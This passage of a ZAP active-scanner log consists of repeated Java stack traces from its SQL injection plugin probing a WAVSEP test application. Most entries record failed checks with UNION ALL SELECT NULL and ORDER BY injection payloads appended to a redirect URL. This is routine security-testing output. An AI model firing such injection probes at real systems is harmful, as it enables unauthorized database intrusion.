org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679576 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9679577 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679578 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679579 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679580 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679581 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679583 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679584 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679585 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679586 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679587 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679588 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt ORDER BY 8562#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt ORDER BY 8562# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679589 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown 